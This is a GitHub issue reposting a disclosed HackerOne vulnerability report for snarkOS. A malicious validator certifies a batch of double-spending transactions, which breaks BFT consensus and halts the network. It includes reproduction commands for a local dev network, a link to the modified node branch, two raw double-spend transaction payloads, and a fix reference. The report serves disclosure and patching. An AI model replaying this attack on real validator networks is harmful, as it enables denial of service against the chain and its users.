Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

An invalid BatchPropose will be certificated and the related BatchCertificate can break the BFT and take down the network #2880

Closed
feezybabee opened this issue Nov 30, 2023 · 2 comments
Closed

An invalid BatchPropose will be certificated and the related BatchCertificate can break the BFT and take down the network #2880

feezybabee opened this issue Nov 30, 2023 · 2 comments
Labels
bug Incorrect or unexpected behavior

Comments

@feezybabee
Copy link

https://hackerone.com/reports/2242904

Summary

An invalid BatchPropose can break the BFT and take down the network

Steps To Reproduce:

1.Use the normal snarkos to start 3 validators

nohup cargo run --release start --validator --dev 0 --nodisplay >> validator_0.log &
nohup cargo run --release start --validator --dev 1 --nodisplay >> validator_1.log &
nohup cargo run --release start --validator --dev 2 --nodisplay >> validator_2.log &

2.Use the modified snarkos to start 1 malicious node.The malicious node will not check the transaction is valid or not, so it will pack a transaction which's input record has already been spent.

Branch: https://github.com/ghostant-1017/snarkOS/tree/test/uncheck

nohup cargo run --release start --validator --dev 3 --nodisplay >> validator_3.log &

3.We create two transactions which's input records is the same one, and we broadcast it to the malicious node.

Like below:

{"type":"execute","id":"at188k3j7t0ynjthjuucvtyenxyx90mapz5rsy0kzl2clz08aylt59qj5p6z7","execution":{"transitions":[{"id":"au1anrm7vke9f4tc9rz8t7tczcvqjqjdhkgrgq7n0qyrl62mv5nhvpq4nxq4u","program":"credits.aleo","function":"transfer_private","inputs":[{"type":"record","id":"5693775116352996503339045333470096099188630940442547874218385091461139188787field","tag":"704943545647908889897852223503115016833231923888418137294614521925498202542field"},{"type":"private","id":"1952801256471349338355674683097412915881579139554226374210233227729522719923field","value":"ciphertext1qgqqz97mqrlf397p62z3fcskxgdjnuxqxslztm5uepsj2m5xjsa35ypuxkk8vl8pu2wp9cvhfrfjlzl4gp3y5fpf7q2jgsjmh7s97fzdqyh4t7tf"},{"type":"private","id":"6330923336000535578943777648534041420507488513940715361689663415429156445021field","value":"ciphertext1qyqryp6hp5fngrdg2sxwdhsh59r5c4qcgjdmhvn4edjkl2pxymmwqygaxjxh5"}],"outputs":[{"type":"record","id":"1036188174537079548470111986500324576458075397411863248185985614522828118375field","checksum":"3741215244083463247886626633191558063183233018176825882419716019034989952177field","value":"record1qyqspv4mlzgut0dtx8zpgjvmwacwyqhka5k5vukhvt3txh593qs6uygjqyxx66trwfhkxun9v35hguerqqpqzqzxx0mv04pxr2w6wluclmth6er2z802j6yspjzce8zaj05ptd52qdjcml5ufhu2vescatfjcrdhnz0lk9t4x78jz5j7ny4yrmtmmukqs0lpsuh"},{"type":"record","id":"3712312147575312153487299940934502088864935332458827982712938714995948739245field","checksum":"4596201754801597092115994602980777434350423833549994347839885073786845514701field","value":"record1qyqspr6e04kmzx7qf7vw8gw7ynjlyp2jp26q32tgrg2lvjkgfgk6zlgwqyxx66trwfhkxun9v35hguerqqpqzqzu7rlqtlmdwnj7qpcxs8apgzvnk40xl7e4n88gdk06389ekf8qpxdz4a8tzjr0s6v99c8xmnfguu8ty09dzpf06egxyphenau2xgfq6fh29ak"}],"tpk":"8211707299810051430599677482135853301079390997121838729797291773541511639202group","tcm":"2043453353674354578032371758361804144578016472642203324084380650932254970524field"}],"global_state_root":"sr18qzkj0flx5xwc3nvqdffygt2mle3rn5runj4q6jnmy6w3gpc2s8qqt468f","proof":"proof1qypqqqqqqqqqqqqpqqqqqqqqqqqqzqqqqqqqqqqqptrpttk0q84dk3d427q8x63xnl4gjpyt0dnzutzuwmdk7xekht0dyyje2ynkwrn48u9vuhc5g27gp72kt09cew3cujhqtwv9eryhj05w80m4xmf5jyv3pjv6dp27qryu34yaeaglmj2lal2gcll8sx90qqq73jej0kyaxcqgzvkr6255n32ln8mjns4vyh060dxp3jxujt3ngl7qlp05v4vhqag3vl90rdygpacqaetz9we4e8xrvrwznjy3wdgnj0a4dsg5yh6e95pzh7ngdrj9a58fndajwe0y3ld6fjrv9d2wsz0gq62jt0n722f756pn06ulsu4q78v346peg3ar4p2c2qdxxyvlf3pdwft9asqj9cq36jnkyhtz5p2nsxgmuwscp9z8nsy2lv7uqg5807cvnkxltq2fhke7kxywmw4vld2uvun3huf3dc09ns3f990sdynm9qytrc2c32432zzu744xac2tgp6vf4kn2w952p9zzkxsmuz8hm2hesl6kw89xt6439fn0f2244vxdkq0tfptlkp6wz0pw2mhtpt6awump0ysqdgdascq47vyu9sq64vj9ea38c28g5auz38zt6p6e4fzz9gpz7aug4cs0sx5ezlz8xwj7v0xm34yrfksf0fxyxqrteq0pvm6thnnhre7ga5urnzycxt39shh7t8spz7hje7cdngyl2ff5f5sj4f0p2a4tc7u46lpp8cqs2t3k2anr0ev6jt6q9lvqu2uk95wjhdqka27sqgzm0p79t94szacp54vcmg77shdn8w6cgk65zssxyw2t7h3h425vh4wch0tx7xlyxk4vycwmz4g8qr3zdyl6xl7mc05k9jjkqvm0evrkdzsesn43qk5g7qshr2vtdmvrdk7eyy5gfyw64hr4dmm0qgjtqqpe8dxsj5784u7d7gks7x3drw84hx0xzprw469q3q90k73hdt02rgsvxft8hzjtjpgjtlt6kjnzdcq7v4gxrrsh4k6g4paj49r4mcvh4ju5dzwwurl3c3qt9c7ugdg9y89y3g24xgl2hpxk48yuqh5s76vzedy9zltgur6qv65wjse3qjsvzlp43mnygsp2trrdle0hamk90myq5z5kv23ff25gvgfp3rkhgknq54ecauhjfdrpk5xdzk6zf5jdzu530ku7c2ytlge94ajrcxddwrshrnz2tzshgc4gjn6hs35gcwx6t5yym8tv7ru566c6gvrkwcaegc9a55wrpf4r9t5ll0lpegnwpatuhljwk93afxl4nvjnkgjpd2sg587n5smk230cnu0zmvtza0f2xnvn3vmcvmnlaxktx5cc2rk8j6e5qe20xteruz893zgyczjhesnyahlmyhfmxfh63szezrvyv650gvfqq7ptgsgqwcdnadpxjnh0chnmj8vuy99076mt9uy4dferk4gz8lszeujynsg45df4j52vkfnzwvmnjam4l3m0f50skcnrecwxu2plespcpgkwf66324l7lp4zvnc856kg3jpptpwrjds24zrqyw725942ugaym4zzly6sqm8lck9yayjs9dltz3ans6h5pf65354tdxj5h6g6q83t58jsas0pedxp4ru6vfdp4qcdrvp856jq8e6j6w68knyp5g8qhx99uu6njly6yuyu57pcd8ff6neg9fqy2ka5gskyfhp2vlknakqhygghf9camleww5ag776ugxltsgumu58ma9s5jnuj2uvgga2z9cz3fjkym8zuaw8ns048tznp6zzmeffklwuh9m5634a9ca5vj4psvr9h48zmlnaalym7hppm4hpfwhg5j6p46m4jnm9x50wmlu7qvxtgpj526cwyu806a7k47jw2jsnckxun6dcr82uq084h08kpkkhjsnxppp3veqt2rhrkgefyzx46xagvy5q2g6jumexy7t67c575grry0h3zqcqqqqqqqqqqrkvjqsqmajed7s3cc50dz3auwm3t6vuzqn72975pwy0rkghak06x9gwvt7a7q0dv66sk92wqkvhkqqqvq4xacfpq5raqacap3p33mdm5ffd9jyct7u09sfs4um36crjd08h94mtw73ekaw64mcdgwlkpfuszqw8l07wsv9ssez70w94crhr6qhj362gp4er23cxyzgsredx5uwqppuqh4460ettruqzvcfeevzkczcv0nrdv3de0mzk582he4m93rqrujjj3yazzg2kyev8survkn6xgqqqwck6j8"},"fee":{"transition":{"id":"au15gcc8843pm5pd50r4vhfd232h8futl5ehlx4gc4r3d3lfhsxvuysrfnqpz","program":"credits.aleo","function":"fee_public","inputs":[{"type":"public","id":"4057197456177134166304773213401621121386897695702004443467605047952430933975field","value":"2210u64"},{"type":"public","id":"5800438749245883177672810260201373662549236896193499790783513514440500868271field","value":"100u64"},{"type":"public","id":"3228060948814981199265722781995747287301502911288478352402196297342506204534field","value":"4287163819273088695916473020670567185080453672300626488619279262849433337177field"}],"outputs":[{"type":"future","id":"8249974751543984618966701024284048171828794845918303299853545519685039332155field","value":"{\n  program_id: credits.aleo,\n  function_name: fee_public,\n  arguments: [\n    aleo1rhgdu77hgyqd3xjj8ucu3jj9r2krwz6mnzyd80gncr5fxcwlh5rsvzp9px,\n    2310u64\n  ]\n}"}],"tpk":"6207615761040833377696998142482173464214334759681161528988111772798332749760group","tcm":"8312379479940061385079182132081765536229967734262043615276788456124355558570field"},"global_state_root":"sr1u6z68uv7nwasxjnd0sje87ql0gww40va5zs82vxhg70zm8wh9v9qnd54jv","proof":"proof1qyqsqqqqqqqqqqqpqqqqqqqqqqqgs06pfjpc8usj3nu02hvc237p035tysq209e0en3t5se52kfs72mdv9eaj38vezwxjrxcpxdcpgypqxeq7np2rvkmu2vpdk6qngay2r4w8p8r4j60pp48rvkfzqeq4gmpvh4g4lzsc23yxv26lp96rzkshqdwda7l5dnzsdvyfu9num6h423dcx3dj3zs0fdxch9at2fuku3vxf4zxppla6aa69qxdj52p2cf7wqrnat96n77ydm8nl87242qnncuhscd494azdlu7wtczsqqpa6ejz7uuvaav6rdy73uxlqucmrj2cgqu0q6rwvla9k69lg37m00kkz8lgra6gz54maug276hlrl05kwpwwcj8vyuwukrtr68nefrh0l55ncqggtmxlhtuz02d7gmw66zy78j20fqu3n9hewrz5xqyz6f4p7tls4ymyrgtkg8gcks5xvk08sktptsy39uxng3nemksp9nl98mm4mlq50n8m5jmstz9vt0seq3qughz5ul5kpndf3pw6gp8m5gfkh37tcnq8stcfr4244sfxqd03wcqwzma9se6suqppjk9hnd4z9mtzd6sz42md6xv0s6v5xxxc2ldwgz44uxqqw46dxvnw8vad2lcff02j03c5c6x7f6dg3d3evgll50ju57lal3reffxs7sg34l8hef8z49x76jscqkzlmjgapum9gt4gkusspme44rymavke38d6mjqk9j8n3gtl98u8tsvgy38tzhyx7pl5lwkvsfymy57qakdkm2a6humjgrdj9j2wdupvux0yj6j9yguphwqz27vagwvv46u0fc3frjvh8jsy7f53gqqxjqd0v7tj2hm5nk46yndxq6hhy9nx2qcnqmdqstuqn3k5erqn9c57s3nc0c2gd3dv2y72r785fhe3lewga4sl5z9wzgfvh70n5mgd7jrg9fnn2tjewp42ykuq2ex2xltp4pue4je4nyu4crlyn5ur9a49a5ux38fy2u5w6fpcrtk5828umyf4k7lkyl4ah726yw8kyzgghst68jzk4knn0j6y4n036t0q2hdunz9nfnxejpefkcvzr73hqgxe6z9yupxn67y2a6kajhwvs5ca2g6msj7m4xm9hytp8jaaphq2ynkq6hjasnfpnc8gvhex88ue2fz70566c283rvylmc6m0ntrs4fx3dggvdmqrqvqqqqqqqqqqqumsask38ga60y55nhp6pq87xwe496fedyddh5sgk7cfv69v6cvgdtlfvsuh4uwqkqqtqwgrz9puqqqtw7mmjp5cf93yuyqzy4sn86fmkcmwuc3m2wyhf5mg7v4aa65laxr0cz9qn69k7gw3yxstde3776vpq9t7fp439xeydkzr0jrtzdqy9qzhcmr8hqdtpfj5ynfmut0z9gds7nels4hsedghdsadsnzlvx30796cf9g4r8wtdvrtvw2h9kjeue4d4e38crt6cuwpnwthx7pk68ylqyqqcvawlx"}}
{"type":"execute","id":"at1kptz04u2klvr24je5tf9warv9tnhqhphvkawh2aujg6dw3khjszszkvuvg","execution":{"transitions":[{"id":"au192y0uts4yelhh780ys389zgmal433sq3r2ufcs0rkpv73t9g9v9snz7crw","program":"credits.aleo","function":"transfer_private","inputs":[{"type":"record","id":"5693775116352996503339045333470096099188630940442547874218385091461139188787field","tag":"704943545647908889897852223503115016833231923888418137294614521925498202542field"},{"type":"private","id":"5161104982177057294261082097104900685322363519627722569471890130287351231395field","value":"ciphertext1qgqdmp3dztrsjdmeemjpctkq4k99e6xsplhy7qqa5wvsfnuansn8qqwy9t2yzuutnaks38y9lf69txjceu47u69tn837pqu87pxepdftqqqkyn6x"},{"type":"private","id":"1340096847520724601220218819499278791228818545131828344862405090979760308237field","value":"ciphertext1qyqvz5059nqua8zx6avpe4h2wgrgjk8hvj2j9ljlua03qz3s4ng5jqgk72vmk"}],"outputs":[{"type":"record","id":"7311675982347805611331877706125791604730659913525782732275312816686683327123field","checksum":"4646381080966389541096505119876397939576139347304957517178156231692084508040field","value":"record1qyqsp2gywxku8dmqctngn0rzw88fpy5wm6gl5edvhhzzjl7ur2y06sc2qyxx66trwfhkxun9v35hguerqqpqzqqmlu2933a3ecfn07nm0kdpfagg0e54768mg0fuda7e6vmr3vv5q89ux5ck8s46afyh79sfgsmvszkppae77cec8ky4glcfsnsqfk9qkv77w36"},{"type":"record","id":"404365250388991787861970725395168212726758189357328831786715877149635493447field","checksum":"4724492167844028901778097622602568690702781737041162121814004860120470872956field","value":"record1qyqsp2qsvm4xtqnqtr5uglstcjvcfzkn7wx5lm02rmzmn2xangftnug3qyxx66trwfhkxun9v35hguerqqpqzqpwkulrs9ytzk6zr4av5mtkhpkrep6a8mr3hf2gh8z6m4a6zd26qxy3agd3gvxhtguw3gnu8n05d3azm68sn8u5g58qljpsqc2x8qeqgmfr9r3"}],"tpk":"3465829821022769262354078875933530426901336606439719316957189602884093928146group","tcm":"3106220420169137142556993690112244431579861155499533913550750927899740287787field"}],"global_state_root":"sr1gg9xf8w2khkvr67tnyzwlztv88355el36jkmq6mrqxzuvskjavzstnyat3","proof":"proof1qypqqqqqqqqqqqqpqqqqqqqqqqqqzqqqqqqqqqqqyt2w2arecadjse2sawtyrx83ha23999ldh4yq64d92n0c47wjjdmdzlgqjy9du6yf8xz6vfqkqkgz2tn49vaew2fean27drztasc2u7nh695zunagdjvuk3acwsn4ekslswwesvl74ncu96j7rsxxm22syqnkedna36slpce907ev09a9wl8hfs7g7pzx7ghdh3w463qp4f3zpjvn6nmvtcugrlr8u2n0j0rkmcqcd4efgv6g4mht8nrmetuth547sueudvyr8fqh8c9s707j6kk4upnj9ae4auhef0fmn2n57pja9wcqunq0uwz6wzp9ka0yrgwj6m2gq6va6tmyl4js90saf4arxf0yzclwqq9lj53qrdw92nmxvtswdsgqqllrnygm9j9mza77xjgz43vy2evgjk6m8zf8f43de90vkr78kdu4yxevv3ky2jlqpxkszghaj6h2qpuelq82246ynafhtmg957xlg73tm4xtl94pm7xd4rzje0n46mulsy26c7ag68dpcrmfevwkp5fw5qd0pkc7l4tu6htkjvg4pnrnr8fd2zegzqhj2yg4j4syedqmgzchyd7l9f0359pp4py8slpa2argkcqnq4mr2a4e0xu4wlzsnx454lhh8w28nu66pjfj25ftyk4zexlnav6cf400f6yd84f4ex9m6jsqxxczerg6dmexp399lzy4qax03eecyp44vz7x9gp5y33df6x04tkq29f2u9yt5xhxk2j75jhmam72m78qq5f02jkwpwq29uk6039ncz92q5pzrskqwc6msg9dlxn83y72mjml8zxkk6rmtlszqrmsvhjats40qyzwwugfs065wxz8z29ec36vf406cum0hxp6mehl28gh7cvz4splsr7fm4j767ua2tplwwwjmv8p5qwxw4u3ycr9smm6fnmaqxvrs90wla3hc53nxzvnxjlr9shteqjy5pslhmzl0mgp5f9vulxn22r52uq8hweeghxhjt5lekg54x6vrfmsj8jxss7dx4fl3n87w4aj5ztrv9d5rawy9v7zvknt4pkpq55ad28ex8hgh6zxmsyxwv42zpc5umrzzm05uc436z2syg837fzhe7f5xjerqsan0kz97470lj2u439tmqnqzwldlg2r0nc3qlqmjplz06vg8s6upukynh303409vzejqarg6gsd2ct2rwy0252yxh47y48dxrh2c5uqzr3ngl9zvmac7vwlgl3k2cdyfzvcwhhqses3k97834waztxjc7rfpexf4glj0q6k647sqmcuvzk3ex7evt6427n8w9qfuy9xnt3ttgejtcrd89gdgse43lqcdhn5yh38nyza477vrr86zs9u52r4sstntue4jtsy4nkmn2p6uhs5qv6q43rvvv2u55hgh4wpaup3d8qq8wkzvejdcxs6y6ta4l94nvr3gypzh3jdjke99fd9sqt0mp08h220g4upy8a56a2jxj20cu0vdagz0g080p5hvlcwd33hw382uf4z3s7fleuxjd74k7e7ypenr2hvzt7ugyfml6080y8zk348wzjdr0j7a6pfcuvw2nr2vx9mzdajhzv8fvx7q2yjvwnsr4fv3yru0vx733sz3nlqqd3fk0rzqlfcygvg4w4x9etq97jp3lkv9k22wgzmuddpy0v6r2rnqf64ztyv6kryqa3caf49yqs3q9yf5wtwffysaz4k78j075h0f86qvmd5eqhgtm2cv5sxpulwts8ajpkn5qujhxywtr0u6zqcgzpwu9elupsfu9zwz43gwtv9z599vqkzhuvg2lfjuwmm2pvgxm7x7mljg6wm90rmlkgrp9y75hdlawrsqs4gfynwteq8lgt8y2smz4ag04mkan23k462aght5fmfgz5lzappwhm3g2ujctsysmr8rg6trv6cl8v74e78fhrjwy3zu5eu4xepg9sjqcqqqqqqqqqqrc527qls5k6h32f7qvpfyvwj6pc24caslxvlhtg4yf0l3w4cqqpz5kag6huyr34h6pqc0qdh0q8lqqqsww5lens5055yu59cje3lqz9xyfnjfs5qw6janvdruc9rtun2dcxxwmstv8h36vyts3l00z6txzgqq2r0hvu6axgxydykf9cschxteukxwxd99e947p7r8x2q44n5ph0pegk55w8rw6l0advvw0nwsgy4faz3smq0lc0t4m4pcgdcm73yvgz39gxdrtam5ce9hgmjsgnf7ufmqgq2q3ldq"},"fee":{"transition":{"id":"au1tcquf54ul69gpg36rhzvr54zyget8fdmas0tmw7v3msdplyfqgqss6q67x","program":"credits.aleo","function":"fee_public","inputs":[{"type":"public","id":"764188915425529833772054256927174196177666525697561739879384704775345874894field","value":"2210u64"},{"type":"public","id":"4795188676928235538309805038286139105350446019775264761913018565217356099157field","value":"100u64"},{"type":"public","id":"3284929129238158181222052723373469916739510189775122119885650571442002095462field","value":"5177355447174310717337157018740262343354489598017571099071448834419515557336field"}],"outputs":[{"type":"future","id":"2682930141150917461378561290498828640030327776879551923960031130822900721507field","value":"{\n  program_id: credits.aleo,\n  function_name: fee_public,\n  arguments: [\n    aleo1rhgdu77hgyqd3xjj8ucu3jj9r2krwz6mnzyd80gncr5fxcwlh5rsvzp9px,\n    2310u64\n  ]\n}"}],"tpk":"6521698554172186727401845419080322730501235397331943833639458776486489974744group","tcm":"2730688155070844320517735580328120189310083227777576859595533779190419020892field"},"global_state_root":"sr16r9j4l83s38wpswhxfy8lq50s9jala40afsf00hrfahruyywxq8sptqy4x","proof":"proof1qyqsqqqqqqqqqqqpqqqqqqqqqqqprx5e7txzh7crt0txnss8eje7sensp4vhl0nqllakwf2fkuc0gyjehvz9ehnxays4tsq6w5zsj3gqq9gvkng6v43my0dy5hpkfu72c2n4rhksf35mztxm82a4hcvgnhugn3cqqfawfhu3ehwmqjtmnfjxrqpuhamtwuxjl3j5svvave0q0zzm7y3wq77c7czsr2q2r627d6pmx5mcttqg0u9x866y6hflqdk6fzq2fehg2x59xyndrmq37cktd2vuz0nhfsl863egs52q0dm5lztle4vfh0jrza0gk2rsljm6a3eqknqpmww07nsk94aavhhmgl5xnj6eu4lk3mdus3g3jc03fc2rdc7us2xrfnjx9v6chzxr8huxyxk25ehgpew7p2qnj5hg8zn5jyk774kg26ttkk7ck8xr64ll4qwus03ets6f0l2nrwuafc6ytcdyknynsws6qygsyxenpcvwwj98c7v7m29puvmm5y39mh0hg4lcefd8c263v7cqv6va0pntv63tls0k7rzemcy6fqdty7zenjdgcq3hj5w93h7tk0atwdqrmt4meharmsj3lz7ufuavlwp83trqxxt83ppzv3t70d3ctzq3m4j29v99226mcd7mv8d585qj3ymvg6zw5utnthdzjcmswpzww7mqksf60sed4us73ekgcadc9zqpmthnf5srm2rz75p73zv30vgskh5u879svs2h4eefmqv4wt6ung8dhzelg5n3duw6l49g29ngzjhwxf8cjt8xgjn4f0978znzyxsjgyycsdjlpws7jlhe6nfeq4kqjqq3a2z22f0azcfqksn85d2gqm2yqf4u80rzam20v0cz4gneqmad85vqkjv3t6w8qcut6wzgm02amqvq30jemnkqclsfldzc8p84pej4sr826j59vqk47vehlxx7l2cj28g9kp9pl0rh598g883v7wndhp3nffk2gw97u0pqr4yk3rw2ev5xfs8h4uc8m7nlh2xgmwy94xupw6n9kemly3hqpyaw65wac7j37xuszzquphfes6xs68tel4sfql3mk6e2cghv5zyf9dc7puysycafkv48zrpq7c4ywgg270zldeusre9lqm7l9rlz3x2rgsq3wksa95p8cmqscgymu2dfvnuydwq9g00hyz9jcfl85x928yppqrdnr8v2qc9943g3qvqqqqqqqqqqqgf35m0h69l78w30m92m2f69hgrdp7hwj4wdh22nnsak9j6su3wgsm4txtgrea4pplsrhfq7kukaqqqryvemmhunw4qxmhmr3kp9p005f0ahjqfx40hraz7wj0qfmnxs36de6cyaguhmagqtu4vd9uj5t6qqqyww8v8n8qpp0jwfavglckkuxhn5jye8taw8vm7ez4m9fxspn2fqjf3cww03vg7gamq9y8cvndln76r0pknt0h7ewwc02lpsjfxf6tenh7f2r6l5xv79txrlyhs9w0grsyqqyzj2uw"}}

4.Check the logs and we will see: https://cdn.jsdelivr.net/gh/ghostant-1017/img@main/img/image-20231107100525204.png

Proof-of-Concept (PoC)

  1. When the node receive the BatchPropose or BatchCertificate, it will not check the transmissions are valid or not.
  2. The node will update_dag-> commit_leader_certificate -> order_dag_with_dfs

https://github.com/AleoHQ/snarkOS/blob/3f845c1205d3e5e1731e33099d88970410e5b003/node/bft/src/bft.rs#L476

  1. Next consensus_sender.tx_consensus_subdag.send((subdag, transmissions, callback_sender)).await?; will call process_bft_subdag -> try_advance_to_next_block -> check_next_block , since the block is invalid, the check will fail.

https://github.com/AleoHQ/snarkOS/blob/3f845c1205d3e5e1731e33099d88970410e5b003/node/bft/src/bft.rs#L538

  1. The code logic will jump to step1 again.

Additional Materials

Truncated logs: https://raw.githubusercontent.com/ghostant-1017/logs/master/validator_0_2023_11_07_02_35_00_2023_11_07_02_36_00.log

Impact

An invalid BatchPropose will be certificated and the related BatchCertificate can break the BFT and take down the network
@feezybabee feezybabee added the bug Incorrect or unexpected behavior label Nov 30, 2023
@vicsn
Copy link
Collaborator

vicsn commented Dec 1, 2023

Note that this attack works when two transactions are sent in different batches. But we should also cover the case where the duplicate inputs are used within the same batch.

@feezybabee
Copy link
Author

Addressed in this PR: https://github.com/AleoHQ/snarkVM/pull/2229

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug Incorrect or unexpected behavior
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@vicsn @feezybabee